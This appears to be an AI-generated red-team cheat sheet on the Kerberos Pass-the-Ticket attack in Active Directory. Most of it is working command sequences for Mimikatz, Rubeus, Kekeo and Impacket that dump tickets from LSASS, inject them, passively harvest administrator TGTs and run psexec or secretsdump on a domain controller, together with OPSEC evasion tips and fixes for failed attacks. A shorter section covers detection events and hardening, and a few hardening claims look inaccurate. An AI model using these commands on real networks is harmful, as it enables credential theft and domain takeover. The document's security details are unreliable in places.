attack-5-pass-the-ticket-ptt.md (25345B)
1 --- 2 title: "Attack #5 β Pass-the-Ticket (PtT)" 3 description: "Pass-the-Ticket is a Kerberos credential theft and replay attack where an attacker extracts a valid Kerberos ticket β either a Ticket Granting Ticketβ¦" 4 category: active-directory 5 subcategory: "Credential Access" 6 tags: ["active-directory", "kerberos", "ntlm", "hashing"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-One/π΄ Attack #5 β Pass-the-Ticket (PtT).md" 11 --- 12 # π΄ Attack #5 β Pass-the-Ticket (PtT) 13 14 *** 15 16 ## π How It Works 17 18 Pass-the-Ticket is a **Kerberos credential theft and replay attack** where an attacker extracts a valid Kerberos ticket β either a Ticket Granting Ticket (TGT) or a Ticket Granting Service (TGS) ticket β directly from LSASS memory on a compromised host, then injects it into their own session to impersonate the victim. Unlike Pass-the-Hash which abuses NTLM, PtT operates entirely within the Kerberos protocol β meaning it works even in environments where NTLM has been disabled, and critically, **it can bypass MFA** because the ticket is already authenticated and cryptographically valid. 19 20 The key distinction is what you steal and how you use it. A stolen **TGT** is the golden prize β it acts as a master pass, allowing the attacker to request TGS service tickets for **any resource** the victim has access to, for the remaining lifetime of the ticket (typically 10 hours). A stolen **TGS** is more limited β it grants access only to the specific service it was issued for, but requires no further interaction with the DC. 21 22 > β οΈ **Windows Server 2022+ / Credential Guard:** On systems with Credential Guard enabled, Kerberos tickets are isolated in the Virtual Secure Mode (VSM) and cannot be extracted from LSASS memory via traditional dumping tools like Mimikatz or Rubeus. The ticket injection attack still works if you have tickets from an older system, but extraction becomes impossible on hardened hosts. See "Hardening Commands" below for details. 23 24 ### TGT vs TGS β What to Steal and When 25 26 | Property | TGT (Ticket Granting Ticket) | TGS (Service Ticket) | 27 |---|---|---| 28 | **Issued by** | KDC (AS-REP) | KDC (TGS-REP) | 29 | **Encrypted with** | KRBTGT hash | Target service account hash | 30 | **Grants access to** | **Any service in the domain** | Only the specific service it was issued for | 31 | **Lifetime** | 10 hours (renewable for 7 days) | Typically 10 hours | 32 | **Value** | Extremely high β full domain access | Moderate β single service access | 33 | **Where found** | LSASS memory of logged-in user | LSASS memory + Windows ticket cache | 34 35 ### The Full Attack Flow 36 37 ``` 38 1. Gain foothold + local admin on any domain-joined Windows host 39 2. Dump Kerberos tickets from LSASS memory (Mimikatz / Rubeus) 40 3. Identify high-value TGTs (Domain Admins, service accounts, admin users) 41 4. Export ticket to .kirbi file OR base64 blob 42 5. Inject ticket into own session (kerberos::ptt / Rubeus ptt) 43 6. Authenticate to domain resources AS the victim β no password needed 44 7. MFA is bypassed β ticket is already authenticated 45 ``` 46 47 *** 48 49 ## βοΈ Prerequisites 50 51 | Requirement | Detail | 52 |---|---| 53 | **Local admin / SYSTEM on host** | Required to read LSASS memory where tickets are cached | 54 | **Active user sessions** | Victim user must be currently logged in (or recently logged in) β their TGT must be in memory | 55 | **Kerberos reachable** | Port 88 (Kerberos) must be accessible to inject and use the ticket | 56 | **Ticket validity window** | TGT must still be valid (10-hour default lifetime) β expired tickets are useless | 57 | **Linux users** | Tickets stored in ccache files (`/tmp/krb5cc_*`) β readable if you control the process/user | 58 59 *** 60 61 ## π οΈ Tools 62 63 | Tool | Platform | Notes | 64 |---|---|---| 65 | **Mimikatz** | Windows | `sekurlsa::tickets /export` + `kerberos::ptt` β the original PtT toolset | 66 | **Rubeus** | Windows | Superior modern tool β dump, triage, inject, monitor all in one | 67 | **Impacket** | Linux | `ticketer.py`, `getST.py`, `getTGT.py` β full Kerberos ticket toolkit | 68 | **CrackMapExec / NetExec** | Linux | `--use-kcache` flag to authenticate with ccache ticket | 69 | **Evil-WinRM** | Linux | Accepts KRB5CCNAME environment variable for ticket-based auth | 70 | **Kekeo** | Windows | Alternative to Mimikatz for ticket manipulation | 71 | **ticketConverter.py** | Linux | Converts `.kirbi` (Windows) β `.ccache` (Linux) format β critical for cross-platform use | 72 73 *** 74 75 ## π» Full Commands 76 77 ### π΅ Step 0 β Enumerate Tickets in Memory (Reconnaissance) 78 79 ```powershell 80 # Windows β built-in, list current session's tickets 81 klist 82 83 # Windows β list all tickets in all sessions (requires admin) 84 klist sessions 85 86 # Rubeus β list and triage all tickets across all sessions 87 .\Rubeus.exe triage 88 89 # Rubeus β list all tickets with full detail (times, encryption type, flags) 90 .\Rubeus.exe dump /nowrap 91 92 # Mimikatz β list all tickets 93 kerberos::list 94 kerberos::list /export 95 ``` 96 97 *** 98 99 ### π΄ Mimikatz β Dump & Inject Tickets (Windows) 100 101 ```powershell 102 # ββ STEP 1: Dump all tickets from LSASS ββββββββββββββββββββββββββββββββββββββ 103 104 privilege::debug 105 106 # List all Kerberos tickets in memory 107 sekurlsa::tickets 108 109 # Export ALL tickets to .kirbi files in current directory 110 sekurlsa::tickets /export 111 112 # ββ STEP 2: Inspect exported tickets βββββββββββββββββββββββββββββββββββββββββ 113 # Files will be named: [0;XXXXXX]-0-0-40e10000-Administrator@krbtgt-CORP.LOCAL.kirbi 114 # The filename contains: [LUID]-[flags]-[enctype]-[username]@[service]-[domain] 115 116 # ββ STEP 3: Inject a specific ticket into current session ββββββββββββββββββββ 117 kerberos::ptt [0;XXXXXX]-0-0-40e10000-Administrator@krbtgt-CORP.LOCAL.kirbi 118 119 # Inject multiple tickets at once (glob pattern) 120 kerberos::ptt *.kirbi 121 122 # ββ STEP 4: Verify injection βββββββββββββββββββββββββββββββββββββββββββββββββ 123 kerberos::list 124 125 # ββ STEP 5: Use the injected ticket ββββββββββββββββββββββββββββββββββββββββββ 126 # From cmd.exe β access resources as the injected user 127 dir \\DC01\C$ 128 dir \\fileserver01\shares$ 129 psexec.exe \\DC01 cmd.exe 130 ``` 131 132 *** 133 134 ### π΄ Rubeus β Full PtT Workflow (Windows β Recommended) 135 136 ```powershell 137 # ββ Dump tickets from all sessions (base64 + decoded) ββββββββββββββββββββββββ 138 .\Rubeus.exe dump /nowrap 139 140 # Dump tickets for a specific LUID (logon session) 141 .\Rubeus.exe dump /luid:0x3e7 /nowrap 142 143 # Dump only TGT tickets (filter for krbtgt service) 144 .\Rubeus.exe dump /service:krbtgt /nowrap 145 146 # ββ Export ticket to .kirbi file ββββββββββββββββββββββββββββββββββββββββββββββ 147 .\Rubeus.exe dump /luid:0x3e7 /service:krbtgt /nowrap > ticket_b64.txt 148 149 # ββ Inject ticket from base64 blob ββββββββββββββββββββββββββββββββββββββββββββ 150 .\Rubeus.exe ptt /ticket:<base64_encoded_ticket> 151 152 # Inject from .kirbi file 153 .\Rubeus.exe ptt /ticket:Administrator.kirbi 154 155 # ββ Verify the ticket is injected βββββββββββββββββββββββββββββββββββββββββββββ 156 .\Rubeus.exe triage 157 klist 158 159 # ββ Monitor for new tickets being created (real-time harvest) ββββββββββββββββ 160 .\Rubeus.exe monitor /interval:5 /nowrap 161 162 # Auto-harvest and inject new TGTs as they appear (e.g., admin logs in nearby) 163 .\Rubeus.exe harvest /interval:30 164 165 # ββ Request a TGS using the injected TGT (access specific service) ββββββββββββ 166 .\Rubeus.exe asktgs /ticket:<base64_TGT> /service:cifs/DC01.corp.local /nowrap /ptt 167 .\Rubeus.exe asktgs /ticket:<base64_TGT> /service:host/DC01.corp.local /nowrap /ptt 168 ``` 169 170 *** 171 172 ### π΄ Kekeo β Alternative Ticket Injection (Windows) 173 174 ```powershell 175 # ββ Dump and export tickets with Kekeo βββββββββββββββββββββββββββββββββββββ 176 .\kekeo.exe 177 tkt::list 178 179 # Export specific ticket to .kirbi 180 tkt::export ::0 output.kirbi 181 182 # Inject ticket into current session 183 tkt::ptt ::output.kirbi 184 ``` 185 186 *** 187 188 ### π΄ Linux β ccache Ticket Workflow (Impacket + NetExec) 189 190 ```bash 191 # ββ Convert .kirbi (Windows) β .ccache (Linux) βββββββββββββββββββββββββββββββ 192 ticketConverter.py Administrator.kirbi Administrator.ccache 193 194 # Convert .ccache β .kirbi (reverse direction) 195 ticketConverter.py Administrator.ccache Administrator.kirbi 196 197 # ββ Set ticket for use by Impacket tools βββββββββββββββββββββββββββββββββββββ 198 export KRB5CCNAME=/tmp/Administrator.ccache 199 200 # ββ Use ticket with Impacket tools βββββββββββββββββββββββββββββββββββββββββββ 201 202 # psexec with ticket (no password) 203 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 204 205 # wmiexec with ticket 206 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 207 208 # smbexec with ticket 209 smbexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 210 211 # secretsdump with ticket (dump all domain hashes) 212 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 213 214 # smbclient β browse shares 215 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local 216 217 # ββ NetExec with ticket βββββββββββββββββββββββββββββββββββββββββββββββββββββββ 218 export KRB5CCNAME=/tmp/Administrator.ccache 219 nxc smb DC01.corp.local --use-kcache 220 nxc smb DC01.corp.local --use-kcache -x whoami 221 nxc winrm DC01.corp.local --use-kcache 222 223 # ββ Evil-WinRM with ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββ 224 export KRB5CCNAME=/tmp/Administrator.ccache 225 evil-winrm -i DC01.corp.local -r corp.local 226 ``` 227 228 *** 229 230 ### π΄ Impacket β Request TGT from Scratch (If You Have Creds/Hash) 231 232 ```bash 233 # Request TGT using plaintext credentials (saves as .ccache) 234 getTGT.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 235 236 # Request TGT using NT hash (Overpass-the-Hash style) 237 getTGT.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c -dc-ip 10.10.10.10 238 239 # Request TGT using AES key (stealthiest β no RC4 downgrade) 240 getTGT.py corp.local/Administrator -aesKey <AES256_KEY> -dc-ip 10.10.10.10 241 242 # Export the TGT and use it 243 export KRB5CCNAME=Administrator.ccache 244 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 245 ``` 246 247 *** 248 249 ### π΄ Requesting Specific Service Tickets (TGS via PtT) 250 251 ```bash 252 # Get a service ticket for CIFS (file shares) using a TGT 253 getST.py corp.local/Administrator -k -no-pass -spn cifs/DC01.corp.local -dc-ip 10.10.10.10 254 255 # Get a TGS for HOST service (PSExec, remote commands) 256 getST.py corp.local/Administrator -k -no-pass -spn host/DC01.corp.local -dc-ip 10.10.10.10 257 258 # Get a TGS for LDAP (BloodHound, DCSync) 259 getST.py corp.local/Administrator -k -no-pass -spn ldap/DC01.corp.local -dc-ip 10.10.10.10 260 261 # Impersonate another user via S4U2Self/S4U2Proxy (covered in Attack #16 β Constrained Delegation) 262 getST.py corp.local/svc_account -k -no-pass -spn cifs/DC01.corp.local -impersonate Administrator 263 ``` 264 265 *** 266 267 ### π΄ Harvesting Tickets Passively (Real-Time Collection) 268 269 ```powershell 270 # Rubeus β monitor for new TGTs every 5 seconds, output in base64 271 .\Rubeus.exe monitor /interval:5 /nowrap 272 273 # Rubeus β harvest TGTs and automatically inject them every 30 seconds 274 .\Rubeus.exe harvest /interval:30 275 276 # Ideal scenario: Run on a host where admins frequently log in 277 # Rubeus silently captures their TGTs as they authenticate 278 ``` 279 280 *** 281 282 ## π― OPSEC Tips 283 284 - **Prefer TGT theft over TGS theft** β a TGT gives full access; a TGS only buys you one service 285 - **Use Rubeus `/nowrap`** at all times β corrupted base64 from line wrapping is the most common failure point 286 - **Use AES tickets over RC4** β if you can request AES TGTs, they draw far less attention than RC4 tickets in AES-enforced environments 287 - **Rubeus `monitor`** is your silent sentry β deploy it on a server where privileged users log in and let it harvest TGTs passively without any repeated LSASS access 288 - **Check ticket lifetime before injecting** β a 9-hour-old TGT with 1 hour left is useless for a long operation; `klist` shows the expiry time 289 - **Use FQDN not IP** when authenticating with Kerberos tickets β Kerberos doesn't work over raw IPs; always use `DC01.corp.local` not `10.10.10.10` 290 - **Convert kirbi β ccache correctly** β the most common mistake when moving between Windows tooling and Linux Impacket is forgetting this conversion step 291 292 ### OpSec Ranking by Stealth 293 294 | Method | Stealth | Speed | Notes | 295 |---|---|---|---| 296 | **Rubeus harvest + monitor** | βββββ | Fast | Passive, no LSASS access on repeat β deploy and forget | 297 | **Rubeus dump + ptt (base64)** | ββββ | Fast | Single LSASS access, quick injection β 2-3 minutes total | 298 | **Mimikatz sekurlsa::tickets + ptt** | βββ | Medium | Older signature, still detectable, multiple Mimikatz invocations | 299 | **Extracting from Linux ccache** | βββββ | Fast | Off-network ticket use β no DC communication needed | 300 | **Kekeo ticket dumping** | ββββ | Medium | Less common than Mimikatz/Rubeus, lower detection baseline | 301 302 ### Time-to-Execute Estimates 303 304 - **Full PtT with Rubeus (dump β verify β inject β access resource):** 3 minutes 305 - **Passive harvest via Rubeus monitor (waiting for admin to log in):** 5β60 minutes (depends on target presence) 306 - **Linux ccache workflow (after tickets transferred):** 2 minutes 307 - **Kekeo ticket manipulation:** 2β4 minutes 308 309 ### Tool Version Compatibility 310 311 - **Rubeus v1.6.4+:** Supports `/ptt` injection, `/dump`, `/monitor` reliably; no major breaking changes 312 - **Mimikatz 2.2.0+:** Standard sekurlsa commands stable; Kerberos operations work cross-Windows versions 313 - **Impacket (current):** ticketConverter, psexec, wmiexec all Kerberos-capable; requires Python 3.6+ 314 - **NetExec latest:** `--use-kcache` stable; works with ccache format from all sources 315 - **Evil-WinRM v4.0+:** KRB5CCNAME support stable; requires Kerberos library installed on Linux 316 317 *** 318 319 ## π‘οΈ Detection β Event IDs 320 321 | Event ID | Source | What to Look For | 322 |---|---|---| 323 | **4768** | Security Log | TGT requested β baseline normal, but flag if requestor IP doesn't match the account's usual workstation | 324 | **4769** | Security Log | TGS requested β watch for the **same TGT being used from two different IP addresses** simultaneously | 325 | **4770** | Security Log | TGT renewal β unusual renewal from an unexpected host | 326 | **4624** | Security Log | Logon Type 3 with Kerberos β compare source IP to known workstation of that user | 327 | **4648** | Security Log | Logon with explicit credentials β attacker using injected ticket to access remote resource | 328 | **Sysmon EID 10** | Sysmon | LSASS process access β ticket extraction precursor (same as PtH detection) | 329 | **Sysmon EID 1** | Sysmon | `Rubeus.exe` or `mimikatz.exe` process creation (signature-based) | 330 331 **Primary detection signature:** A TGT or TGS ticket being used from a **different IP address or machine** than the one that originally requested it. This is a near-definitive indicator of Pass-the-Ticket. Modern SIEMs can correlate the 4768 (ticket request origin) with subsequent 4769 (service ticket usage) and flag the discrepancy. 332 333 *** 334 335 ## π§© Troubleshooting 336 337 | Error | Cause | Fix | 338 |---|---|---| 339 | `KRB_AP_ERR_SKEW` | System time skew between attacker and DC (>5 min) | Sync attacker system time with DC: `net time \\DC01 /set` or `timedatectl set-ntp true` | 340 | `KDC_ERR_ETYPE_NOSUPP` | Encryption type not supported (e.g., AES requested but only RC4 available) | Specify correct etype: RC4 = etype 23, AES256 = etype 18; check domain policy | 341 | `KRB5_CC_BADFORMAT` | Corrupted or malformed .ccache file | Regenerate ticket via getTGT.py; verify .kirbiβccache conversion with `ticketConverter.py` | 342 | `KDC_ERR_PREAUTH_FAILED` | NT hash/AES key is incorrect or account is disabled | Verify hash from LSASS dump matches actual account; check account lockout in AD | 343 | `ERR_KRB5_KDC_UNREACH` | Cannot reach KDC on port 88 (firewall, routing, or bad DNS) | Test connectivity: `nc -zv DC01.corp.local 88`; verify DNS resolves DC FQDN to correct IP | 344 | `Ticket expired` | TGT/TGS lifetime exceeded | Check ticket validity with `klist`; extract fresh ticket from active user session | 345 | `LSASS dump returns zero tickets` | No Kerberos tickets in memory (user has no active session or Credential Guard enabled) | Ensure user is actively logged in; on Win2022+ with Credential Guard, extraction is not possible | 346 | `Base64 corruption from Rubeus /dump` | Line-wrapping in terminal output | Always use `/nowrap` flag to prevent line breaks: `.\Rubeus.exe dump /nowrap > output.txt` | 347 348 *** 349 350 ## πΊοΈ MITRE ATT&CK 351 352 **Technique:** T1550.003 β Use Alternate Authentication Material: Pass the Ticket 353 **Tactic:** TA0008 β Lateral Movement 354 355 ### Known APT Groups Using PtT 356 357 - **APT29 (Cozy Bear):** Leverages PtT for domain persistence and lateral movement post-compromise 358 - **FIN6 (Magecart operators):** Uses PtT to move laterally within compromised environments after initial foothold 359 - **Wizard Spider (Conti operators):** Employs PtT for rapid lateral movement during ransomware operations 360 - **HAFNIUM (State-sponsored, China-based):** Combines PtT with ProxyShell exploitation for Exchange compromise chains 361 362 **Detection baseline:** Organizations using Defender for Identity should flag "Suspicious Kerberos ticket usage" (multiple TGS requests from single source IP in short window) as a high-confidence PtT indicator. 363 364 *** 365 366 ## π‘οΈ Advanced Detection & Hardening 367 368 ### Sigma Rule References 369 370 - **Sigma Rule: PtT via Rubeus/Mimikatz** β Monitor for tool execution + 4768 requests within 60 seconds 371 - **Sigma Rule: Abnormal TGS usage** β Correlate 4769 events to 4768 origin; flag if source IP differs 372 - **Sigma Rule: LSASS dumping + Kerberos activity** β Sysmon EID 10 (LSASS access) followed by 4768 within 2 minutes 373 374 ### EDR Detections (Defender for Identity) 375 376 - **"Unusual Kerberos ticket usage"** β When a ticket created on one host is used on a different host 377 - **"Sensitive group membership modification"** β If attacker uses PtT to escalate into DA/EA/BA groups 378 - **"Remote code execution via Kerberos ticket"** β Combination of ticket injection + lateral movement in same session 379 380 ### Hardening Commands 381 382 ```powershell 383 # ββ Enable Credential Guard (Windows Server 2016+) ββββββββββββββββββββββββββββ 384 # Block LSASS memory access entirely β prevents ALL ticket extraction 385 dism /online /enable-feature /featurename:IsolatedUserMode 386 387 # ββ Enforce Protected Users group (DC enforcement) βββββββββββββββββββββββββββ 388 # Members cannot use NTLM or DES; forces AES/RC4 only 389 Add-ADGroupMember -Identity "Protected Users" -Members "CN=Administrator,CN=Users,DC=corp,DC=local" 390 391 # ββ Set short TGT lifetime via GPO (reduce ticket reuse window) βββββββββββββββ 392 # Group Policy > Computer Configuration > Policies > Windows Settings > Security Settings 393 # > Kerberos Policy > Maximum lifetime for user ticket = 4 hours (default 10) 394 # Command to check current policy: 395 gpresult /h report.html 396 # Look for: "Maximum lifetime for user ticket" 397 398 # ββ Enable AES-only enforcement (disable RC4 in Kerberos) ββββββββββββββββββββ 399 # On DC: Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters" -Name "SupportedEncryptionTypes" -Value 28 400 # 28 = AES128 + AES256 only (RC4 disabled) 401 402 # ββ Set account lockout + login attempt monitoring ββββββββββββββββββββββββββββ 403 # Via GPO: Account Policies > Account Lockout Policy 404 # Threshold: 3β5 failed attempts; Duration: 30 minutes 405 ``` 406 407 ### Forensic Artifacts (What Survives Where) 408 409 | Artifact | Location | Survives Cleanup | Notes | 410 |---|---|---|---| 411 | **Kerberos .kirbi files** | `C:\Windows\Temp\` or current dir | Temporary β deleted if cleanup run | Recovered via DFIR tools if not overwritten | 412 | **Event Log 4768/4769** | Security Event Log | Yes (unless log cleared) | Primary detection source; correlate origin IP vs. usage IP | 413 | **LSASS memory dump** | Pagefile, hiberfil.sys, DRAM | If not cleared | Volatility/WinDbg analysis can recover dumped tickets post-reboot | 414 | **Rubeus/Mimikatz process execution** | Sysmon EID 1, MFT | Sysmon/Event logs persist | Signatures detect tool execution; MFT shows creation timestamp | 415 | **ccache file (Linux)** | `/tmp/krb5cc_*` or `.kerberos/cache` | No β cleanup removes | Immediate deletion after ticket use is OPSEC best practice | 416 | **Registry RunKeys** | HKLM\Software\Microsoft\Windows\Run | Yes | If attacker persists via scheduled task or RunKey, it persists | 417 | **User environment variables** | User registry hive | Yes | If KRB5CCNAME set in environment, survives session | 418 419 *** 420 421 ## π Attack Chain Context 422 423 ``` 424 [Pass-the-Ticket] βββ Full Domain Access as Victim User (no password needed) 425 β 426 ββββ π©Έ DCSync β inject DA's TGT β request LDAP TGS β DCSync all hashes 427 ββββ π« Golden Ticket β if KRBTGT hash obtained, forge unlimited TGTs 428 ββββ π« Silver Ticket β forge TGS without touching KDC (Attack #12) 429 ββββ π Overpass-the-Hash β convert NT hash into a TGT on the fly (Attack #6) 430 ββββ π Access any file share, database, mailbox as the victim 431 ββββ π― Rubeus harvest β wait for DA to log in β instant privilege escalation 432 ``` 433 434 ### Cross-References to Related Attacks 435 436 - **Attack #4 β Pass-the-Hash (PtH):** Uses NTLM directly; PtT is the Kerberos equivalent and often preferred 437 - **Attack #6 β Overpass-the-Hash (OPtH):** Converts NT hash to TGT; output is then used with PtT techniques 438 - **Attack #11 β Golden Ticket:** If you obtain KRBTGT hash via DCSync, forge unlimited TGTs instead of stealing individual ones 439 - **Attack #12 β Silver Ticket:** Similar to PtT but forges service-specific tickets without KDC interaction 440 - **Attack #16 β Constrained Delegation (S4U2Self/S4U2Proxy):** Uses TGTs to request tickets on behalf of other users 441 442 ### PtH vs PtT β Know When to Use Which 443 444 | Scenario | Use PtH | Use PtT | 445 |---|---|---| 446 | NTLM enabled, Kerberos optional | β | β | 447 | NTLM disabled / Kerberos-only | β | β | 448 | MFA enabled on target account | β (bypasses MFA) | β (bypasses MFA) | 449 | Only have NT hash, no session | β | β (need existing ticket) | 450 | Victim currently logged in nearby | β | β (harvest their TGT) | 451 | Need to access specific Kerberos service | β | β | 452 | Cross-domain / forest access | β | β (inter-realm TGTs) | 453 454 *** 455 456 > β **Attack #5 β Pass-the-Ticket complete.** Tell me to move on when you're ready for **Attack #6 β Overpass-the-Hash (Pass-the-Key)**. 457 458 Sources 459 Pass-the-Ticket (PtT) Attacks Explained: Detection, Impact & Mitigation https://netwrix.com/en/cybersecurity-glossary/cyber-security-attacks/pass-the-ticket-attack/ 460 What is a Pass-the-Ticket Attack? Detection & Prevention - Cymulate https://cymulate.com/cybersecurity-glossary/pass-the-ticket-attack/ 461 Pass the Ticket Attack Explained - MITRE ATT&CK T1550.003 https://www.picussecurity.com/resource/blog/t1550.003-pass-the-ticket-adversary-use-of-alternate-authentication 462 How to Defend Against a Pass the Ticket Attack: AD Security 101 https://www.semperis.com/blog/how-to-defend-against-pass-the-ticket-attack/ 463 Active Directory Attacks: Pass-the-Hash, Pass-the-Ticket & Qualys ... https://blog.qualys.com/product-tech/2026/02/11/qualys-etm-detect-pass-the-hash-pass-the-ticket-attacks 464 Pass-the-Ticket Attacks | BeyondTrust https://www.beyondtrust.com/resources/glossary/what-are-pass-the-ticket-attacks 465 Pass-the-Ticket (PtT) Attacks Explained: Detection, Impact ... https://netwrix.com/ko/cybersecurity-glossary/cyber-security-attacks/pass-the-ticket-attack/ 466 What are Pass-the-Hash (PtH) & Pass-the-Ticket (PtT)? https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-are-pass-the-hash-pth-pass-the-ticket-ptt/ 467 Use Alternate Authentication Material: Pass the Ticket https://attack.mitre.org/techniques/T1550/003/ 468 What Is Pass the Ticket? How It Works & Examples - Twingate https://www.twingate.com/blog/glossary/pass%20the%20ticket